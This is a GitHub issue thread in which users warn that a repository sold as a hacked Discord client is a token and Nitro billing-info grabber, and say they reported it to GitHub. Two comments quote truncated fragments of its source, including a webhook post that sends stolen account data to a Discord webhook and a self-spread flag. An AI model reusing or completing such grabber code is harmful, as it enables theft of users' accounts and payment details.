### ISSUE TITLE
This is a Token Grabber DO NOT USE

### ISSUE THREAD

**Issue by sh4d0wph03n1x** [yoyoyo548/discord-hacked-client#5]
After reading through the source code I have determined that this is a token and nitro billing info grabber. DO NOT USE

**Comment by catdroutcode** [comment]
Yep 
`webhook = {
        "content": "",
        "embeds": embeds,
        "username": "Discord Token Grabber",
        "avatar_url": "https://discordapp.com/ass>
    }
    try: #put your webhook here
        urlopen(Request("https://discord.com/api/>
    except:
        pass
    if self_spread:`

**Comment by catdroutcode** [comment]
More source evidence
`}
                ],
                "author": {
                    "name": f"{username} ({user_i>
                    "icon_url": avatar_url
                },
                "footer": {
                    "text": f"NUKED BY MEEP CANT >
                }
            }
            embeds.append(embed)`

**Comment by sh4d0wph03n1x** [comment]
Reiteration: DO NOT USE. Have notified GitHub of malware, hopefully they will take it down.

**Comment by catdroutcode** [comment]
Good!
